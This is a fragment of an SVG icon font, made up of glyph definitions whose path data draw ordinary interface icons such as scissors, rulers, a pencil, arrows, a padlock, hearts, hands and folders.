<glyph unicode="&#xe613;" d="M391.529 148.706c-16.414 0-31.594-4.728-44.875-12.409l-69.933 73.909 188.536 199.198-21.896 20.721-187.362-197.993-187.422 197.993-21.865-20.721 188.536-199.198-69.933-73.879c-13.252 7.65-28.461 12.378-44.845 12.378-49.815 0-90.353-40.538-90.353-90.353s40.538-90.353 90.353-90.353 90.353 40.538 90.353 90.353c0 22.498-8.584 42.887-22.227 58.7l67.403 71.228 67.404-71.228c-13.673-15.842-22.227-36.202-22.227-58.7 0-49.815 40.538-90.353 90.353-90.353s90.353 40.538 90.353 90.353-40.538 90.353-90.353 90.353zM120.471-1.882c-33.22 0-60.236 27.015-60.236 60.236s27.016 60.236 60.236 60.236 60.236-27.015 60.236-60.236-27.016-60.236-60.236-60.236zM391.529-1.882c-33.22 0-60.236 27.015-60.236 60.236s27.015 60.236 60.236 60.236 60.236-27.015 60.236-60.236-27.015-60.236-60.236-60.236z" />
<glyph unicode="&#xe614;" d="M150.588 480v-512h210.823v512h-210.823zM331.294-1.882h-150.588v29.636h60.236v30.118h-60.236v30.599h30.118v30.118h-30.118v30.118h60.236v30.118h-60.236v29.636h30.118v30.118h-30.118v30.118h60.236v30.118h-60.236v30.599h30.118v30.118h-30.118v30.117h60.236v30.118h-60.236v30.118h150.588v-451.764z" />
<glyph unicode="&#xe615;" d="M135.288 480h-59.754c-24.907 0-45.176-20.269-45.176-45.176v-320.964l75.927-149.263 74.21 149.353v320.873c-0.030 24.908-20.299 45.176-45.207 45.176zM75.535 449.882h59.754c8.282 0 15.059-6.776 15.059-15.059v-30.69h-89.871v30.69c0 8.283 6.746 15.059 15.059 15.059zM60.476 342.964v31.051h89.871v-31.051h-89.871zM118.904 57.721h-26.203l-32.226 63.368v191.759h30.118v-195.192h30.118v195.192h29.636v-191.85l-31.443-63.277zM240.941 480v-512h210.823v512h-210.823zM421.647-1.882h-150.588v29.636h60.236v30.118h-60.236v30.599h30.118v30.118h-30.118v30.118h60.236v30.118h-60.236v29.636h30.118v30.118h-30.118v30.118h60.236v30.118h-60.236v30.599h30.118v30.118h-30.118v30.117h60.236v30.118h-60.236v30.118h150.588v-451.764z" />
<glyph unicode="&#xe616;" d="M362.496 479.548l-362.044-362.044 149.083-149.052 362.014 362.014-149.052 149.082zM43.038 117.504l20.962 20.962 42.587-42.587 21.293 21.293-42.587 42.587 21.654 21.654 21.293-21.293 21.293 21.293-21.293 21.293 21.293 21.293 42.587-42.587 21.293 21.293-42.587 42.587 20.962 20.962 21.293-21.293 21.293 21.293-21.293 21.293 21.293 21.293 42.587-42.587 21.293 21.293-42.587 42.587 21.625 21.625 21.293-21.293 21.293 21.293-21.293 21.293 21.293 21.293 42.616-42.587 21.293 21.293-42.616 42.587 21.324 21.323 106.466-106.496-319.428-319.428-106.496 106.466z" />
<glyph unicode="&#xe617;" d="M107.279 449.882v-465.589l141.131 98.485 143.119-98.183v465.288h-284.25zM361.412 41.758l-113.122 77.644-110.863-77.342v377.705h223.985v-378.007z" />
<glyph unicode="&#xe618;" d="M301.99 176.595v303.405h-182.332v-303.495l90.986 61.832 91.347-61.741zM149.775 233.397v216.486h122.127v-216.576l-61.35 41.442-60.778-41.352zM481.882 449.671v-451.554h-451.764v451.554h59.452v-30.118h-29.334v-391.318h391.529v391.318h-120.621v30.118h150.739z" />
<glyph unicode="&#xe619;" d="M180.706 239.059h-180.706v180.706h30.117v-123.754c30.509 96.166 121.555 165.165 225.882 165.165 105.592 0 199.409-71.077 228.111-172.845l-29.003-8.162c-25.058 88.847-106.948 150.919-199.108 150.919-97.159-0.030-181.188-68.548-202.029-161.912h126.735v-30.118zM331.294 208.941v-30.118h126.735c-20.872-93.395-104.779-161.882-202.029-161.882-92.22 0-174.080 62.072-199.108 150.92l-29.003-8.162c28.672-101.767 122.489-172.845 228.111-172.845 104.177 0 195.012 68.668 225.882 165.105v-123.724h30.118v180.706h-180.706z" />
<glyph unicode="&#xe61a;" d="M481.882 208.941h-210.824v-210.824h-30.118v210.823h-210.823v30.118h210.823v210.824h30.118v-210.824h210.823v-30.118z" />
<glyph unicode="&#xe61b;" d="M361.412 344.471c0 58.127-47.284 105.412-105.412 105.412s-105.412-47.285-105.412-105.412c0-52.556 38.791-95.925 89.209-103.756v-242.598h30.118v242.357c51.501 6.867 91.498 50.658 91.498 103.996zM256 269.177c-41.532 0-75.294 33.762-75.294 75.294s33.762 75.294 75.294 75.294 75.294-33.762 75.294-75.294-33.762-75.294-75.294-75.294zM301.176 329.412h-30.118c0 16.625-13.493 30.117-30.118 30.117v30.118c33.22 0 60.236-27.016 60.236-60.236z" />
<glyph unicode="&#xe61c;" d="M467.697 393.954l-42.255 42.285c-17.017 17.047-46.833 17.047-63.909 0l-272.776-272.805-51.862-159.262 158.058 53.157 272.716 272.745c17.649 17.589 17.649 46.26 0.030 63.88zM93.184 79.616l19.426 59.603 58.248-58.277-59.121-19.877-18.552 18.553zM131.162 163.223l165.436 165.436 63.579-63.548-165.466-165.466-63.548 63.579zM317.892 349.982l21.956 21.956 63.579-63.548-21.956-21.956-63.579 63.548zM446.404 351.368l-21.685-21.685-63.579 63.548 21.685 21.715c5.692 5.692 15.601 5.692 21.293 0l42.255-42.285c5.903-5.903 5.903-15.42 0.030-21.293z" />
<glyph unicode="&#xe61d;" d="M496.911 424.493l-42.255 42.255c-17.046 17.047-46.833 17.047-63.909 0l-226.966-226.966-51.862-159.232 158.088 53.158 226.906 226.906c8.524 8.524 13.221 19.877 13.221 31.955s-4.699 23.401-13.221 31.925zM168.177 155.995l19.215 58.94 57.826-57.796-58.489-19.667-18.553 18.522zM205.764 239.179l120.049 120.049 63.548-63.548-120.049-120.049-63.548 63.548zM347.106 380.522l21.956 21.956 63.548-63.548-21.956-21.956-63.548 63.548zM475.618 381.907l-21.685-21.715-63.548 63.548 21.685 21.715c5.723 5.692 15.631 5.692 21.293 0l42.255-42.255c2.831-2.861 4.397-6.626 4.397-10.661s-1.566-7.771-4.397-10.632zM451.764 254.118h30.118v-286.118h-481.882v451.764h225.882v-30.118h-195.764v-391.529h421.647v256z" />
<glyph unicode="&#xe61e;" d="M451.764 419.764v60.236h-391.529v-60.236h-15.541c-24.636 0-44.694-20.329-44.694-45.327v-90.052c0-24.998 20.058-45.327 44.694-45.327h181.429c8.282 0 15.059-6.776 15.059-15.059v-45.176h-30.358v-210.823h90.353v210.823h-29.877v45.176c0 24.907-20.269 45.176-45.177 45.176h-181.429c-8.011 0-14.577 6.837-14.577 15.21v90.052c0 8.373 6.566 15.209 14.577 15.209h15.541v-90.353h391.529v90.353h30.118v30.118h-30.118zM271.059-1.882h-30.118v150.588h30.118v-150.588zM421.647 329.412h-331.294v120.47h331.294v-120.47z" />
<glyph unicode="&#xe61f;" d="M502.995 184.305l-267.084 268.77-4.036-4.005c-20.119 19.908-46.743 30.9-75.084 30.931 0 0 0 0-0.030 0-28.552 0-55.447-11.144-75.656-31.353-20.239-20.209-31.383-47.074-31.383-75.716 0-28.341 11.023-54.965 30.931-75.084l-66.5-66.53c-9.126-9.156-14.155-21.263-14.155-34.124 0-12.921 5-24.998 14.065-34.033l144.896-146.341c9.095-9.096 21.203-14.125 34.063-14.125 12.921 0 25.028 5.060 34.124 14.185l167.394 167.394 108.454 0.030zM79.842 372.962c0 20.54 8.011 39.846 22.558 54.393 14.547 14.516 33.822 22.528 54.362 22.528 0.030 0 0.030 0 0.030 0 20.299 0 39.333-7.891 53.79-22.106l-108.604-108.635c-14.246 14.487-22.136 33.521-22.136 53.82zM205.794 38.144c-3.404-3.404-7.981-5.331-12.8-5.331s-9.367 1.868-12.709 5.24l-109.508 110.652h245.579l-110.562-110.562zM346.474 178.824h-305.543l-5.511 5.602c-3.433 3.404-5.3 7.921-5.3 12.74 0 4.849 1.898 9.397 5.331 12.86l200.403 200.403 194.801-196.036-48.61-0.030-35.569-35.539zM472.486 119.823l-12.258 18.191-12.589-18.010c-9.608-13.764-41.050-60.567-41.050-84.269 0-29.063 23.642-52.706 52.706-52.706s52.706 23.673 52.706 52.736c0 23.552-30.238 70.295-39.514 84.058zM459.294 13.176c-12.438 0-22.588 10.149-22.588 22.588 0 7.228 10.511 27.708 23.070 47.917 12.047-20.179 22.106-40.629 22.106-47.917 0-12.438-10.149-22.588-22.588-22.588z" />
<glyph unicode="&#xe620;" d="M256 464.941c-132.849 0-240.941-108.092-240.941-240.941s108.092-240.941 240.941-240.941 240.941 108.092 240.941 240.941-108.092 240.941-240.941 240.941zM256 434.824c52.706 0 100.834-19.577 137.849-51.682l-296.96-296.99c-32.136 36.984-51.712 85.142-51.712 137.849 0 116.224 94.57 210.823 210.823 210.823zM256 13.176c-52.706 0-100.834 19.577-137.849 51.682l296.96 296.99c32.135-36.984 51.712-85.142 51.712-137.849 0-116.224-94.57-210.823-210.823-210.823z" />
<glyph unicode="&#xe621;" d="M376.471 480h-240.941c-24.907 0-45.177-20.269-45.177-45.176v-421.647c0-24.908 20.269-45.176 45.177-45.176h240.941c24.908 0 45.176 20.269 45.176 45.176v421.647c0 24.907-20.269 45.176-45.176 45.176zM135.53 449.882h240.941c8.313 0 15.059-6.746 15.059-15.059v-45.177h-271.059v45.177c0 8.313 6.746 15.059 15.059 15.059zM391.529 359.529v-240.941h-271.059v240.941h271.059zM376.471-1.882h-240.941c-8.313 0-15.059 6.747-15.059 15.059v75.294h271.059v-75.294c0-8.313-6.747-15.059-15.059-15.059zM271.059 43.294c0-8.313-6.747-15.059-15.059-15.059s-15.059 6.747-15.059 15.059 6.746 15.059 15.059 15.059 15.059-6.747 15.059-15.059z" />
<glyph unicode="&#xe622;" d="M451.764 239.059v-30.117h-391.529v30.118h391.529z" />
<glyph unicode="&#xe623;" d="M256 480c-83.034 0-150.588-67.554-150.588-150.588 0-41.412 16.715-80.083 47.044-108.906 2.56-2.469 5.421-4.638 8.313-6.806l3.102-2.349c5.391-4.247 11.113-7.74 16.836-11.173v-217.118l74.661 57.254 75.926-57.254v217.118c5.723 3.433 11.475 6.957 16.866 11.204l3.102 2.319c2.892 2.168 5.723 4.337 8.313 6.806 30.298 28.822 47.014 67.493 47.014 108.906 0 83.034-67.554 150.588-150.588 150.588zM301.176 43.505l-45.959 34.666-44.394-34.063v127.247c14.517-5.029 29.696-7.589 45.177-7.589s30.66 2.56 45.177 7.589v-127.85zM338.793 242.311c-1.716-1.656-3.644-3.042-5.572-4.428l-3.704-2.831c-43.52-34.183-103.544-34.154-147.004-0.030l-3.734 2.861c-1.928 1.416-3.855 2.801-5.572 4.428-24.305 23.1-37.677 54.001-37.677 87.1 0 66.44 54.031 120.471 120.47 120.471s120.471-54.031 120.471-120.471c0-33.099-13.372-64-37.677-87.1zM329.788 374.166l5.541-29.575-54.904-10.27 34.515-58.338-25.931-15.36-32.738 55.296-32.828-55.266-25.871 15.36 34.696 58.428-53.489 10.149 5.602 29.575 56.561-10.692v56.29h30.118v-56.561l58.729 10.963z" />
<glyph unicode="&#xe624;" d="M256 480c-83.034 0-150.588-67.554-150.588-150.588 0-41.412 16.715-80.083 47.044-108.906 2.56-2.469 5.421-4.638 8.313-6.806l3.102-2.349c5.391-4.247 11.113-7.74 16.836-11.173v-217.118l74.661 57.254 75.926-57.254v217.118c5.723 3.433 11.475 6.957 16.866 11.204l3.102 2.319c2.892 2.168 5.723 4.337 8.313 6.806 30.298 28.822 47.014 67.493 47.014 108.906 0 83.034-67.554 150.588-150.588 150.588zM301.176 43.505l-45.959 34.666-44.394-34.063v127.247c14.517-5.029 29.696-7.589 45.177-7.589s30.66 2.56 45.177 7.589v-127.85zM338.793 242.311c-1.716-1.656-3.644-3.042-5.572-4.428l-3.704-2.831c-43.52-34.183-103.544-34.154-147.004-0.030l-3.734 2.861c-1.928 1.416-3.855 2.801-5.572 4.428-24.305 23.1-37.677 54.001-37.677 87.1 0 66.44 54.031 120.471 120.47 120.471s120.471-54.031 120.471-120.471c0-33.099-13.372-64-37.677-87.1zM308.706 329.412c0-29.094-23.612-52.706-52.706-52.706s-52.706 23.612-52.706 52.706 23.612 52.706 52.706 52.706 52.706-23.612 52.706-52.706z" />
<glyph unicode="&#xe625;" d="M320.632 449.882h-23.13c-6.988 17.709-23.161 30.118-41.954 30.118h-74.3c-8.794 0-15.963-2.711-21.263-8.072-9.517-9.548-9.457-23.221-9.397-37.737v-354.756l55.748-70.024h4.488v-41.412l30.118 20.721v20.721h4.428l55.808 70.024v340.3h19.456c10.149 0 10.661-16.263 10.661-19.516v-128.482h30.118v128.482c0.030 29.214-16.745 49.634-40.779 49.634zM181.248 449.882h74.3c8.584 0 15.541-8.764 15.541-19.516v-100.954h-90.383v104.93c0 5.843-0.060 14.668 0.542 15.541zM230.912 39.529h-10.029l-40.147 50.447-0.030 209.317h90.353v-209.317l-40.147-50.447z" />
<glyph unicode="&#xe626;" d="M471.763 308.812l-16.384 16.384c2.349 5.391 3.825 11.084 4.187 16.926 0.783 13.101-3.644 25.148-12.529 34.033l-52.555 52.555c-6.204 6.204-13.161 9.337-20.691 9.337-13.523 0-23.161-9.728-33.37-20.059l-272.143-272.143-10.090-88.998 3.163-3.132-29.274-29.274 35.931-6.686 14.668 14.637 3.132-3.132 88.968 10.029 261.933 261.964 13.733-13.733c2.168-2.168 2.831-4.337 2.289-7.379-0.783-4.247-3.885-9.337-8.524-13.975l-90.835-90.865 21.293-21.293 90.835 90.865c9.125 9.095 14.969 19.426 16.866 29.817 2.349 12.83-1.416 24.967-10.601 34.123zM160.918 68.081l-64.091-7.259-7.078 7.077 7.288 64.030 169.322 169.322 63.88-63.88-169.321-169.292zM351.533 258.666l-63.88 63.88 74.21 74.21c4.096 4.187 10.3 10.451 11.324 10.662l52.555-52.556c3.614-3.614 3.885-8.372 3.764-10.872-0.301-5.060-2.651-9.969-6.565-13.915l-71.409-71.409z" />
<glyph unicode="&#xe627;" d="M456.162 213.339l-185.103 185.133v-400.354h-30.118v400.354l-185.103-185.133-21.323 21.323 221.485 221.455 221.485-221.485-21.324-21.293z" />
<glyph unicode="&#xe628;" d="M473.058 224.844l-221.485-221.485-21.293 21.293 185.103 185.103h-385.265v30.118h385.295l-185.133 185.163 21.293 21.293 221.485-221.485z" />
<glyph unicode="&#xe629;" d="M481.882 209.784h-385.295l185.103-185.103-21.293-21.293-221.455 221.455 221.485 221.485 21.293-21.293-185.133-185.133h385.295v-30.118z" />
<glyph unicode="&#xe62a;" d="M477.485 213.339l-221.485-221.455-221.485 221.455 21.293 21.293 185.133-185.103v400.354h30.117v-400.354l185.103 185.103 21.324-21.293z" />
<glyph unicode="&#xe62b;" d="M286.118 149.549c0-11.023-6.235-20.239-15.059-25.48v-64.874h-30.118v64.844c-8.855 5.24-15.059 14.457-15.059 25.51 0 16.625 13.463 30.118 30.118 30.118 16.595 0 30.117-13.462 30.117-30.118zM450.711 225.204v-213.233c0-24.908-20.269-45.177-45.176-45.177h-300.845c-24.907 0-45.176 20.269-45.176 45.176v213.233c0 24.907 20.269 45.177 45.176 45.177h0.723v59.874c0 83.034 67.554 150.588 150.588 150.588s150.588-67.554 150.588-150.588v-59.995c24.425-0.542 44.123-20.51 44.123-45.056zM135.53 270.381h240.941v59.874c0 66.44-54.031 120.471-120.471 120.471s-120.471-54.031-120.471-120.471v-59.874zM420.593 225.204c0 7.951-6.235 14.276-14.005 14.848v-0.12h-301.176v0.332h-0.723c-8.282 0-15.059-6.746-15.059-15.059v-213.233c0-8.313 6.776-15.059 15.059-15.059h300.845c8.283 0 15.059 6.747 15.059 15.059v213.233z" />
<glyph unicode="&#xe62c;" d="M59.362 420.788l159.262-424.689 36.502 228.924 228.924 36.502-424.689 159.262zM228.834 251.347l-22.016-137.999-95.985 255.97 255.97-95.985-137.969-21.986z" />
<glyph unicode="&#xe62d;" d="M391.017 270.983l-28.25-28.25-21.293 21.293 28.25 28.25c29.365 29.364 29.365 77.132 0 106.466s-77.132 29.364-106.466 0l-89.962-89.992c-29.364-29.365-29.364-77.132 0-106.466s77.132-29.365 106.466 0l21.293-21.293c-20.57-20.57-47.525-30.81-74.541-30.81s-53.971 10.27-74.511 30.81c-41.081 41.081-41.081 107.972 0 149.052l89.962 89.962c41.111 41.111 107.941 41.111 149.052 0 41.111-41.051 41.111-107.942 0-149.022zM181.971 238.035l-3.916-3.885 21.233-21.354 3.946 3.916c29.364 29.364 77.131 29.364 106.466 0s29.365-77.132 0-106.466l-91.046-91.106c-29.364-29.365-77.132-29.365-106.466 0s-29.365 77.132 0 106.466l31.865 31.894-21.293 21.293-31.864-31.894c-41.081-41.081-41.081-107.972 0-149.052 20.57-20.57 47.525-30.811 74.541-30.811s53.971 10.27 74.541 30.81l91.046 91.076c41.081 41.081 41.081 107.972 0 149.052-41.14 41.171-108.002 41.081-149.052 0.060z" />
<glyph unicode="&#xe62e;" d="M0 480v-512h512v512h-512zM30.117 299.294h271.059v-301.176h-271.059v301.176zM481.882-1.882h-150.588v301.176h150.588v-301.176zM30.117 329.412v120.47h451.764v-120.47h-451.764z" />
<glyph unicode="&#xe62f;" d="M391.529 449.882h-391.529v-331.294h391.529v331.294zM361.412 148.706h-331.294v271.059h331.294v-271.059zM512 329.412v-331.294h-391.529v91.286h30.118v-61.169h331.294v271.059h-60.717v30.118h90.835z" />
<glyph unicode="&#xe630;" d="M331.294 449.882h-331.294v-271.059h331.294v271.059zM301.176 208.941h-271.059v210.824h271.059v-210.824zM421.647 88.471h-331.294v59.663h30.118v-29.546h271.059v210.824h-29.937v30.117h60.055v-271.059zM512 269.177v-271.059h-331.294v59.663h30.118v-29.546h271.059v210.823h-29.937v30.117h60.054z" />
<glyph unicode="&#xe631;" d="M446.072 290.289l21.293 21.293-52.194 52.194 22.799 22.678-21.233 21.353-245.339-244.164c-14.577 10.12-32.226 16.113-51.291 16.113-49.815 0-90.353-40.538-90.353-90.353s40.538-90.353 90.353-90.353 90.353 40.538 90.353 90.353c0 19.908-6.686 38.189-17.619 53.127l158.54 157.756 52.344-52.345 21.293 21.293-52.315 52.284 21.113 21.022 52.254-52.254zM120.079 29.169c-33.22 0-60.236 27.015-60.236 60.236s27.016 60.236 60.236 60.236 60.236-27.015 60.236-60.236-27.016-60.236-60.236-60.236z" />
<glyph unicode="&#xe632;" d="M256 68.081l-146.161 145.468 21.233 21.353 109.869-109.357v325.18h30.117v-325.18l109.839 109.327 21.233-21.353-146.131-145.438zM481.882 208.038v-194.861c0-8.313-6.747-15.059-15.059-15.059h-421.647c-8.313 0-15.059 6.747-15.059 15.059v195.012h-30.117v-195.012c0-24.908 20.269-45.176 45.176-45.176h421.647c24.908 0 45.176 20.269 45.176 45.176v194.861h-30.118z" />
<glyph unicode="&#xe633;" d="M30.117 449.882v-451.764h451.764v451.764h-451.764zM451.764 28.236h-391.529v60.236h391.529v-60.236zM60.236 118.588v301.176h391.529v-301.176h-391.529zM427.761 173.854l-20.992-21.594-72.794 70.746-46.803-50.477-74.873 132.97-102.43-149.836-24.877 16.986 129.807 189.832 78.426-139.204 39.665 42.827 94.87-92.25z" />
<glyph unicode="&#xe634;" d="M376.471 460.183c-52.375 0-97.913-29.877-120.471-73.457-22.558 43.58-68.096 73.457-120.471 73.457-74.722 0-135.53-60.808-135.53-135.529 0-10.331 1.446-21.052 4.638-33.672l3.283-10.572c43.129-131.132 230.671-282.895 238.652-289.25l9.427-7.589 9.427 7.589c8.493 6.837 208.595 168.599 238.743 289.551l3.373 11.084c3.042 12.107 4.457 22.558 4.457 32.858 0 74.722-60.808 135.53-135.53 135.53zM478.539 299.897l-3.404-11.143c-24.365-97.762-179.079-232.719-219.136-266.331-38.611 32.618-184.38 160.738-219.407 267.204l-3.012 9.517c-2.319 9.366-3.463 17.709-3.463 25.51 0 58.127 47.284 105.412 105.412 105.412s105.412-47.315 105.412-105.412v-7.589h30.118v7.589c0 58.127 47.284 105.412 105.412 105.412s105.412-47.285 105.412-105.412c0-7.77-1.144-15.872-3.343-24.756z" />
<glyph unicode="&#xe635;" d="M4.608 290.981c-3.163 12.62-4.608 23.341-4.608 33.672 0 74.722 60.807 135.529 135.53 135.529 52.374 0 97.912-29.876 120.47-73.457 22.558 43.58 68.096 73.457 120.471 73.457 74.722 0 135.529-60.808 135.529-135.529 0-10.3-1.416-20.721-4.428-32.858l-3.404-11.084c-2.44-9.969-6.867-21.715-13.644-36.111l-27.226 12.83c5.903 12.589 9.698 22.558 11.897 31.352l3.373 11.113c2.199 8.885 3.313 16.987 3.313 24.757 0 58.127-47.284 105.412-105.412 105.412s-105.412-47.315-105.412-105.412h-30.118c0 58.127-47.285 105.412-105.412 105.412s-105.412-47.315-105.412-105.412c0-7.801 1.145-16.143 3.493-25.51l3.012-9.517c2.831-8.644 7.078-18.612 13.282-31.111l-26.985-13.433c-6.867 13.854-11.626 25.088-14.998 35.328l-3.313 10.572zM255.97 21.88c-24.275 19.065-93.425 76.288-149.865 150.98l-24.004-18.191c72.102-95.382 161.25-161.19 164.984-163.93l8.975-6.565 8.915 6.626c3.885 2.861 95.985 71.5 166.731 163.78l-23.884 18.341c-55.658-72.553-127.067-131.494-151.853-151.040zM426.827 256.678l-85.293-60.236-85.293 60.236-85.323-60.236-85.444 60.205-94.148-66.319 17.348-24.636 76.8 54.151 85.444-60.265 85.323 60.236 85.293-60.236 85.293 60.236 76.469-54.091 17.408 24.576-93.876 66.38z" />
<glyph unicode="&#xe636;" d="M421.647 347.392v-218.594c0-25.781-10.149-56.23-19.125-83.065-5.391-16.204-10.993-32.918-10.993-40.087v-22.588c0-8.313-6.747-15.059-15.059-15.059s-15.059 6.747-15.059 15.059v22.588c0 12.047 5.541 28.612 12.559 49.604 7.8 23.492 17.558 52.676 17.558 73.548v218.594c0 8.283-6.204 14.547-14.396 14.547-8.373 0-15.42-6.325-15.692-14.095 0-0.091-0.060-0.18-0.060-0.271l0.030-116.254c0-8.313-6.747-15.059-15.059-15.059s-15.059 6.747-15.059 15.059l-0.030 123.061c0 0.15 0.091 0.271 0.091 0.452v42.345c0 6.988-4.216 14.547-13.433 14.547-8.252 0-15.902-6.325-16.384-13.553-0.030-0.392-0.301-0.753-0.361-1.174v-134.927c0-8.313-6.747-15.059-15.059-15.059s-15.059 6.716-15.059 15.059v147.456c0 0.662 0.301 1.265 0.392 1.897v23.943c0 7.861-7.259 14.517-15.812 14.517-8.403 0-14.969-6.355-14.969-14.517v-26.082c0.060-0.452 0.271-0.844 0.271-1.325v0-147.456c0-8.313-6.746-15.059-15.059-15.059s-15.059 6.746-15.059 15.059v0 138.3c0 0.12-0.090 0.211-0.12 0.332-0.994 7.168-7.469 12.589-15.059 12.589-8.403 0-15.209-6.536-15.209-14.547v-171.821c0-6.264-3.855-11.866-9.698-14.065-5.752-2.199-12.439-0.603-16.595 4.066l-33.642 37.767c-11.836 13.824-19.757 9.366-22.678 7.68-3.493-1.958-5.993-5.15-6.987-8.945-0.964-3.644-0.421-7.469 1.506-10.752l99.148-211.094c1.386-2.199 4.758-4.668 8.855-5.662 6.776-1.627 11.505-7.68 11.505-14.637v-26.654c0-8.313-6.746-15.059-15.059-15.059s-15.059 6.747-15.059 15.059v16.444c-6.957 3.855-12.74 9.457-16.866 16.414l-99.117 211.125c-5.421 9.005-7.078 21.022-4.036 32.557 3.102 11.656 10.662 21.383 21.263 27.407 20.359 11.475 42.828 6.204 60.236-14.095l7.138-8.012v132.276c0 24.636 20.329 44.664 45.327 44.664 5.24 0 10.331-0.903 15.059-2.56 2.018 22.799 21.383 40.719 44.906 40.719 24.124 0 43.942-18.191 45.809-41.171 5.15 1.928 10.722 3.012 16.505 3.012 24.425 0 43.55-19.606 43.55-44.664v-7.891c4.909 1.777 10.18 2.74 15.661 2.74 24.938 0.030 44.484-19.577 44.484-44.635z" />
<glyph unicode="&#xe637;" d="M459.053 316.762l-35.78-242.868c-3.554-18.432-11.716-26.503-17.649-32.406-5.752-5.723-9.577-9.517-9.577-28.1v-30.329c0-8.313-6.747-15.059-15.059-15.059s-15.059 6.747-15.059 15.059v30.329c0 28.762 8.373 39.424 18.492 49.453 4.668 4.638 7.469 7.439 9.156 16.083l35.69 242.116c0.542 3.705 1.536 16.264-8.222 17.619-3.373 0.482-6.114-0.060-8.283-1.716-2.892-2.139-4.94-6.294-5.662-11.385l-14.969-99.87c-0.753-5.15-4.156-9.517-8.915-11.596s-10.27-1.506-14.577 1.476c-1.506-0.241-4.036 0.692-6.565 2.349-4.578 2.921-7.198 8.072-6.897 13.493l8.584 159.202c0.692 8.373-5.12 15.33-13.011 16.023-3.825 0.361-7.5-0.844-10.421-3.283-2.952-2.47-4.699-5.903-5.029-9.668l-13.945-144.023c-0.783-8.101-7.198-13.975-15.993-13.583-2.44 0.15-4.909 0.301-7.409 0.332-8.101 0.18-14.607 6.716-14.757 14.788l-3.464 184.29c0 8.072-6.325 14.396-14.095 14.396s-14.095-6.325-14.095-14.095l-3.554-198.355c-0.12-5.722-3.434-10.903-8.613-13.342-1.868-0.903-3.674-1.807-5.391-2.771-4.428-2.53-9.819-2.62-14.336-0.241-4.518 2.349-7.559 6.837-8.071 11.897l-15.511 160.497c-0.332 3.945-2.108 7.379-5 9.819-2.922 2.439-6.867 3.554-10.391 3.283-3.795-0.332-7.198-2.108-9.637-5.029-2.41-2.892-3.584-6.565-3.252-10.33l15.149-213.745c0.482-6.565-3.404-12.709-9.548-15.089-6.204-2.409-13.191-0.512-17.257 4.668l-46.713 58.82c-6.114 10.24-16.926 13.101-25.299 8.252-4.096-2.38-7.017-6.174-8.222-10.722-1.204-4.517-0.603-9.276 1.807-13.342l106.285-183.326c2.41-4.187 6.355-7.108 11.053-8.252 6.746-1.627 11.505-7.68 11.505-14.637v-20.781c0-8.313-6.746-15.059-15.059-15.059s-15.059 6.747-15.059 15.059v10.541c-7.65 4.126-14.005 10.27-18.492 18.010l-106.316 183.326c-6.415 11.023-8.132 23.884-4.819 36.202 3.252 12.348 11.174 22.649 22.257 29.063 22.829 13.162 52.043 5.331 65.174-17.438l15.239-19.095-11.716 165.135c-1.024 11.505 2.59 23.010 10.18 32.106 7.589 9.036 18.311 14.607 30.088 15.661 11.957 1.084 23.341-2.62 32.436-10.24 4.397-3.704 7.921-8.101 10.541-12.981l0.422 22.678c0 24.154 19.847 43.972 44.212 43.972s44.212-19.848 44.212-44.243l0.421-22.468c2.651 4.909 6.204 9.337 10.632 13.071 9.125 7.65 20.721 11.324 32.467 10.24 24.425-2.139 42.526-23.732 40.388-48.128l-1.596-29.455c0.783 0.692 1.627 1.356 2.44 1.988 8.674 6.505 19.185 9.036 30.66 7.469 23.642-3.283 37.587-24.576 33.792-51.712z" />
<glyph unicode="&#xe638;" d="M420.533 311.341v-176.007c0-23.401-11.535-37.376-19.968-47.556-7.048-8.553-10.722-13.342-10.722-20.901v-53.7c0-8.313-6.747-15.059-15.059-15.059s-15.059 6.747-15.059 15.059v53.7c0 18.764 9.788 30.599 17.649 40.087 7.288 8.825 13.071 15.781 13.071 28.341v176.037c0 9.397-8.072 18.252-16.595 18.252-9.909 0-12.017-1.536-12.108-1.596-1.988-2.68-1.928-17.137-1.897-28.792 0.030-5.692 0.060-12.047-0.060-19.035-0.12-8.252-6.415-14.396-15.18-14.848-8.252 0.060-14.938 6.776-14.938 15.059v63.85c0 9.246-6.686 16.203-15.541 16.203-8.132 0-14.095-6.053-14.818-14.697v-60.325c0-8.313-6.747-15.059-15.059-15.059s-15.059 6.747-15.059 15.059v0 60.566c0 0.091-0.060 0.181-0.060 0.301v23.281c0 1.988-0.421 19.336-14.276 19.336-13.553 0-15.601-12.108-15.601-19.336v-21.172c0-0.844-0.332-1.627-0.482-2.44v-78.125c0-8.313-6.746-15.059-15.059-15.059s-15.059 6.746-15.059 15.059v0 80.836c-1.446 5.843-5.662 11.746-14.035 11.746-8.613 0-15.872-7.861-15.872-17.167v-100.894c0-0.211-0.18-0.392-0.18-0.602v-33.16c0-8.313-6.746-15.059-15.059-15.059s-15.059 6.747-15.059 15.059v25.118c-5.3 1.928-12.981 3.494-17.378 2.5-3.554-0.692-7.138-3.825-9.367-8.162-1.777-3.404-4.156-10.451-0.271-19.185l51.14-111.947c0.482-1.054 0.813-2.139 1.054-3.252 1.686-8.283 9.397-13.733 17.709-12.981 4.186 0.542 8.463-0.904 11.655-3.764 3.162-2.861 5-6.927 5-11.204v-52.525c0-8.313-6.746-15.059-15.059-15.059s-15.059 6.747-15.059 15.059v38.731c-16.143 4.187-29.184 16.896-33.34 33.882l-50.567 110.683c-6.626 14.938-6.234 31.412 0.964 45.387 6.445 12.439 17.709 21.353 30.148 23.883 6.325 1.295 14.878 0.934 23.341-0.783v21.685c0 0.301 0.15 0.572 0.18 0.874v55.717c0 26.082 20.661 47.284 45.989 47.284 6.024 0 11.806-1.204 17.047-3.373 5.994 19.396 22.076 31.834 43.159 31.834 20.118 0 35.9-12.709 41.834-31.955 5.361 2.259 11.234 3.493 17.438 3.493 20.751 0 37.888-13.372 43.58-32.286 5.512 1.204 11.113 1.476 16.143 1.476 25.359 0 46.743-22.137 46.743-48.369z" />
<glyph unicode="&#xe639;" d="M240.941 359.529l-58.97 60.236h-181.971v-451.764h512v391.529h-271.059zM169.321 389.647l58.97-60.236h253.59v-61.048l-451.764 0.783v120.501h139.204zM30.117-1.882v240.911l451.764-0.783v-240.128h-451.764z" />
<glyph unicode="&#xe63a;" d="M391.529 178.582v278.227l-357.767-139.113 357.767-139.113zM361.412 222.584l-244.585 95.112 244.585 95.141v-190.253zM451.764 480v-512h-30.118v512h30.118z" />
<glyph unicode="&#xe63b;" d="M451.764 480v-512h-30.118v512h30.118zM45.989 450.605h345.54v-240.941h-346.052l87.673 119.025-87.16 121.916zM361.412 420.488h-256.844l65.807-92.040-65.295-88.666h256.332v180.706z" />
